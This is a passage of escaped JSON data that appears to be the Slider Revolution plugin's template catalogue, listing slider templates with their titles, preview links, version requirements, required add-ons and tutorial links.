offset=\\\"t:-350px,-350px,-350px,-300px;b:0px,0px,0px,0px;l:0px,0px,0px,0px;r:0px,0px,0px,0px;\\\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"590\":{\"id\":\"635\",\"title\":\"App Website Footer\",\"alias\":\"app-website-footer\",\"zip\":\"packs\\/app-website-footer.zip\",\"uid\":\"5e13126b929feb389f9e083f3476ec46\",\"img\":\"app-website-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-01-17 10:45:12\",\"package\":\"App Website Template\",\"package_order\":\"10\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"591\":{\"id\":\"636\",\"title\":\"App Video Modal\",\"alias\":\"app-video-modal\",\"zip\":\"packs\\/app-video-modal.zip\",\"uid\":\"7fe8115d0b6158c90fe92d1144ed7b01\",\"img\":\"app-video-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/spaceman-app-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=spaceman-app-website-template\",\"version\":\"1.0.0\",\"required\":\"6.5.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">From a stunning feature carousel, to a screenshot gallery and testimonial slider, this mobile app website template has got it all!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2022-01-17 10:46:49\",\"package\":\"App Website Template\",\"package_order\":\"11\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"A Creative Way to Design the Hero Image for Your Mobile App Landing Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-creative-way-to-design-the-hero-image-for-your-mobile-app-landing-page\\/\",\"guide_img\":\"tutorial\\/App-Website-Template.png\",\"active\":\"1\",\"package_id\":\"54\",\"installed\":false},\"592\":{\"id\":\"637\",\"title\":\"Testimonial Carousel Pack\",\"alias\":\"testimonial-carousel-pack\",\"zip\":\"\",\"uid\":\"testimonial-carousel-pack\",\"img\":\"packages\\/testimonial-carousel-pack.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/testimonial-carousel-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=testimonial-carousel-collection\",\"version\":\"1.0.0\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">An elegant slider for your website. Flexible and customizable.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2022-01-31 16:38:17\",\"package\":\"Testimonial Carousel Pack\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Give Your Testimonials Section the Attention It Deserves [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-give-your-testimonials-section-the-attention-it-deserves\\/\",\"guide_img\":\"tutorial\\/testimonial-carousel-pack.png\",\"active\":\"1\",\"package_id\":\"55\",\"installed\":false},\"593\":{\"id\":\"638\",\"title\":\"Testimonial Carousel 1\",\"alias\":\"testimonial-carousel-1\",\"zip\":\"packs\\/testimonial-carousel-1.zip\",\"uid\":\"1cc1f92edb4edd47f880c0b4f77e343d\",\"img\":\"testimonial-carousel-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/testimonial-carousel-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=testimonial-carousel-collection\",\"version\":\"1.0.0\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Want to show testimonials on your website ?  We got you covered.  Our testimonial carousel pack has 5 options to choose from with colours you can easily customise.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2022-01-31 16:41:02\",\"package\":\"Testimonial Carousel Pack\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Give Your Testimonials Section the Attention It Deserves [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-give-your-testimonials-section-the-attention-it-deserves\\/\",\"guide_img\":\"tutorial\\/testimonial-carousel-pack.png\",\"active\":\"1\",\"package_id\":\"55\",\"installed\":false},\"594\":{\"id\":\"639\",\"title\":\"Testimonial Carousel 2\",\"alias\":\"testimonial-carousel-2\",\"zip\":\"packs\\/testimonial-carousel-2.zip\",\"uid\":\"b6ad1675b8d14c0ccc63ffc01b221aac\",\"img\":\"testimonial-carousel-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/testimonial-carousel-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=testimonial-carousel-collection\",\"version\":\"1.0.0\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Want to show testimonials on your website ?  We got you covered.  Our testimonial carousel pack has 5 options to choose from with colours you can easily customise.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2022-01-31 16:43:25\",\"package\":\"Testimonial Carousel Pack\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Give Your Testimonials Section the Attention It Deserves [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-give-your-testimonials-section-the-attention-it-deserves\\/\",\"guide_img\":\"tutorial\\/testimonial-carousel-pack.png\",\"active\":\"1\",\"package_id\":\"55\",\"installed\":false},\"595\":{\"id\":\"640\",\"title\":\"Testimonial Carousel 3\",\"alias\":\"testimonial-carousel-3\",\"zip\":\"packs\\/testimonial-carousel-3.zip\",\"uid\":\"cb4a72fb40fc400a71754f71b9bb2d6e\",\"img\":\"testimonial-carousel-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/testimonial-carousel-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=testimonial-carousel-collection\",\"version\":\"1.0.0\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Want to show testimonials on your website ?  We got you covered.  Our testimonial carousel pack has 5 options to choose from with colours you can easily customise.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2022-01-31 16:46:01\",\"package\":\"Testimonial Carousel Pack\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Give Your Testimonials Section the Attention It Deserves [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-give-your-testimonials-section-the-attention-it-deserves\\/\",\"guide_img\":\"tutorial\\/testimonial-carousel-pack.png\",\"active\":\"1\",\"package_id\":\"55\",\"installed\":false},\"596\":{\"id\":\"641\",\"title\":\"Testimonial Carousel 4\",\"alias\":\"testimonial-carousel-4\",\"zip\":\"packs\\/testimonial-carousel-4.zip\",\"uid\":\"bfca98d6b4042b38df044e9e2a6ca983\",\"img\":\"testimonial-carousel-4\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/testimonial-carousel-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=testimonial-carousel-collection\",\"version\":\"1.0.0\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Want to show testimonials on your website ?  We got you covered.  Our testimonial carousel pack has 5 options to choose from with colours you can easily customise.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2022-01-31 16:47:57\",\"package\":\"Testimonial Carousel Pack\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Give Your Testimonials Section the Attention It Deserves [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-give-your-testimonials-section-the-attention-it-deserves\\/\",\"guide_img\":\"tutorial\\/testimonial-carousel-pack.png\",\"active\":\"1\",\"package_id\":\"55\",\"installed\":false},\"597\":{\"id\":\"642\",\"title\":\"Testimonial Carousel 5\",\"alias\":\"testimonial-carousel-5\",\"zip\":\"packs\\/testimonial-carousel-5.zip\",\"uid\":\"4a9b9c72b51628e1343adde9bff3915f\",\"img\":\"testimonial-carousel-5\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/testimonial-carousel-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=testimonial-carousel-collection\",\"version\":\"1.0.0\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Want to show testimonials on your website ?  We got you covered.  Our testimonial carousel pack has 5 options to choose from with colours you can easily customise.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2022-01-31 16:49:27\",\"package\":\"Testimonial Carousel Pack\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Give Your Testimonials Section the Attention It Deserves [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-give-your-testimonials-section-the-attention-it-deserves\\/\",\"guide_img\":\"tutorial\\/testimonial-carousel-pack.png\",\"active\":\"1\",\"package_id\":\"55\",\"installed\":false},\"598\":{\"id\":\"643\",\"title\":\"Deep Dive Ocean Water Effect\",\"alias\":\"deep-dive\",\"zip\":\"deep-dive.zip\",\"uid\":\"5cc0599857b0108fe4e76adc7fbf9a16\",\"img\":\"deep-dive\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/deep-dive-ocean-water-effect\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=deep-dive-ocean-water-effect\",\"version\":\"1.0.0\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Take a dive into the ocean with this 3D Particles Animation template for Slider Revolution.<br>\\r\\nThe scroll-based interaction makes this hero module an absolute eye-catcher for any ocean-related website.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-02-09 09:23:47\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Digital Underwater Scene for Your Water Sports Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-digital-underwater-scene-for-your-water-sports-website\\/\",\"guide_img\":\"tutorial\\/Deep-Dive-Ocean-Water-Effect.png\",\"active\":\"1\",\"installed\":false},\"599\":{\"id\":\"644\",\"title\":\"Particle Wave Showcase\",\"alias\":\"particle-wave-showcase\",\"zip\":\"particle-wave-showcase.zip\",\"uid\":\"1c9ac477fd636078d1812d8d98060899\",\"img\":\"particle-wave-showcase\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/particle-wave-showcase\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=particle-wave-showcase\",\"version\":\"1.0.1\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Is your website missing that one unique design element to set it apart from your competition? The Particle Wave addon for Slider Revolution enables you to add interactive, 3D particles background animation effects that will amaze your clients!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-02-09 09:30:08\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Design a Hero Image That Feels Alive and Three-Dimensional [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-design-a-hero-image-that-feels-alive-and-three-dimensional\\/\",\"guide_img\":\"tutorial\\/particle-wave-showcase.png\",\"active\":\"1\",\"installed\":false},\"600\":{\"id\":\"645\",\"title\":\"Video Hero Header\",\"alias\":\"video-hero-header\",\"zip\":\"video-hero-header.zip\",\"uid\":\"f6a715d4b10e0746f7eb5100836ba1ab\",\"img\":\"video-hero-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/video-hero-header\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=video-hero-header\",\"version\":\"1.0.0\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Get ahead with this modern, futuristic video hero header with colorful gradients and a polygon particle wave.<br>\\r\\nShowcase the highlights of your tech-related business website with a video button that demands to be clicked.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"Special FX\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-02-09 09:33:10\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Trippy Hero Image Backdrop with Particle Animation [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-trippy-hero-image-backdrop-with-particle-animation\\/\",\"guide_img\":\"tutorial\\/video-hero-header.png\",\"active\":\"1\",\"installed\":false},\"601\":{\"id\":\"646\",\"title\":\"Solar System Showcase Slider\",\"alias\":\"solar-system-showcase-slider\",\"zip\":\"solar-system-showcase-slider.zip\",\"uid\":\"40f7b26ea7f8228d40e8e9cf0f34b5e8\",\"img\":\"solar-system-showcase-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/solar-system-showcase-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=solar-system-showcase-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.15\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Want to amaze your users ? Look no further.  Showcase products, images or anything you can think of with this highly capable and easily customisable full screen slider. <\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-particlewave-addon\\\\\\/revslider-particlewave-addon.php\\\",\\\"name\\\":\\\"Particle Wave AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-02-09 09:50:27\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"602\":{\"id\":\"647\",\"title\":\"Optic Shop Showcase Slider\",\"alias\":\"Optic-shop-showcase-slider\",\"zip\":\"Optic-shop-showcase-slider.zip\",\"uid\":\"01509228c996ad45c2179d03654f499b\",\"img\":\"Optic-shop-showcase-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/optic-shop-showcase-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=optic-shop-showcase-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.16\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This image slider is the perfect showcase for any optic shop, utilizing the blur effect in a brilliant way. It\'s not just made for your optic showcase but also a great fit for any modern product presentation.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":null,\"date\":\"2022-02-16 16:41:07\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Awesome Product Slider with a Built-in Variant Switcher [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-awesome-product-slider-with-a-built-in-variant-switcher\\/\",\"guide_img\":\"tutorial\\/Optic-shop-showcase-slider.png\",\"active\":\"1\",\"installed\":false},\"603\":{\"id\":\"648\",\"title\":\"WordPress Charts And Graphs\",\"alias\":\"charts-template-showcase\",\"zip\":\"charts-template-showcase.zip\",\"uid\":\"4ae2fe61830f96c6c5b316368c1ad2c6\",\"img\":\"charts-template-showcase\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wordpress-charts-and-graphs\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-charts-and-graphs\",\"version\":\"1.0.0\",\"required\":\"6.5.17\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Who says data has to look boring? With our WordPress charts addon, you can create eye-catching sliders and hero sections with interactive and stunning-looking charts.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-charts-addon\\\\\\/revslider-charts-addon.php\\\",\\\"name\\\":\\\"Charts AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-03-03 15:55:16\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create Interactive Charts and Graphs for WordPress [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-interactive-charts-and-graphs-for-wordpress\\/\",\"guide_img\":\"tutorial\\/charts-template-showcase.png\",\"active\":\"1\",\"installed\":false},\"604\":{\"id\":\"649\",\"title\":\"Fashion Website Slider Template\",\"alias\":\"fashion-website-slider-template\",\"zip\":\"\",\"uid\":\"fashion-website-slider-template\",\"img\":\"packages\\/fashion-website-slider.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/fashion-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fashion-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.19\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A fashion slider that\'s not just for fashion! This template is suitable for any image-based marketing campaign and also comes with a fullscreen gallery carousel modal to show more images.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\",\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-03-14 13:00:36\",\"package\":\"Fashion Website Slider\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Summary Slider for Blog Posts, Articles, and More [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-summary-slider-for-blog-posts-articles-and-more\\/\",\"guide_img\":\"tutorial\\/Fashion-Website-Slider.png\",\"active\":\"1\",\"package_id\":\"56\",\"installed\":false},\"605\":{\"id\":\"650\",\"title\":\"Fashion Website Slider\",\"alias\":\"fashion-website-slider\",\"zip\":\"packs\\/fashion-website-slider.zip\",\"uid\":\"8fb8379f47346173fa0dd402dda37360\",\"img\":\"fashion-website-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/fashion-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fashion-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.19\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A fashion slider that\'s not just for fashion! This template is suitable for any image-based marketing campaign and also comes with a fullscreen gallery carousel modal to show more images.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\",\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-03-14 13:04:56\",\"package\":\"Fashion Website Slider\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Summary Slider for Blog Posts, Articles, and More [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-summary-slider-for-blog-posts-articles-and-more\\/\",\"guide_img\":\"tutorial\\/Fashion-Website-Slider.png\",\"active\":\"1\",\"package_id\":\"56\",\"installed\":false},\"606\":{\"id\":\"651\",\"title\":\"Fashion Website Slider Modal\",\"alias\":\"fashion-website-slider-modal\",\"zip\":\"packs\\/fashion-website-slider-modal.zip\",\"uid\":\"788f34043b6a5fcbfa5fc1c3322fb502\",\"img\":\"fashion-website-slider-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/fashion-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fashion-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.19\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">A fashion slider that\'s not just for fashion! This template is suitable for any image-based marketing campaign and also comes with a fullscreen gallery carousel modal to show more images.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"carousel\",\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-03-14 13:08:21\",\"package\":\"Fashion Website Slider\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Summary Slider for Blog Posts, Articles, and More [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-summary-slider-for-blog-posts-articles-and-more\\/\",\"guide_img\":\"tutorial\\/Fashion-Website-Slider.png\",\"active\":\"1\",\"package_id\":\"56\",\"installed\":false},\"607\":{\"id\":\"652\",\"title\":\"Furniture Website Slider\",\"alias\":\"furniture-website-slider\",\"zip\":\"furniture-website-slider.zip\",\"uid\":\"8575493ed5fd1ee2e671e67479fdeccb\",\"img\":\"furniture-website-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/furniture-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=furniture-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.19\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Promote products or create stunning landing pages with the Furniture Website Slider. Each slide comes with a different layout that can be used as a hero module or on an individual section on your website.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2022-03-23 14:05:44\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Quickly Build a Great-Looking Microsite for Your Product [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-quickly-build-a-great-looking-microsite-for-your-product\\/\",\"guide_img\":\"tutorial\\/furniture-website-slider.png\",\"active\":\"1\",\"installed\":false},\"608\":{\"id\":\"653\",\"title\":\"Fitness Gym Website Slider\",\"alias\":\"fitness-gym-website-slider\",\"zip\":\"fitness-gym-website-slider.zip\",\"uid\":\"86894d98e34a590e80a1d0cd3d7dc819\",\"img\":\"fitness-gym-website-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/fitness-gym-website-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fitness-gym-website-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.20\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Make your website visitors want to hit the gym once they see this fitness website slider. The background videos and unique, masked slide transitions make this module stand out!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":null,\"date\":\"2022-04-19 11:02:01\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Multimedia Slider that Lures in More Clients [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-multimedia-slider-that-lures-in-more-clients\\/\",\"guide_img\":\"tutorial\\/fitness-gym-website-slider.png\",\"active\":\"1\",\"installed\":false},\"609\":{\"id\":\"654\",\"title\":\"Ai & Robotics Webside Slider 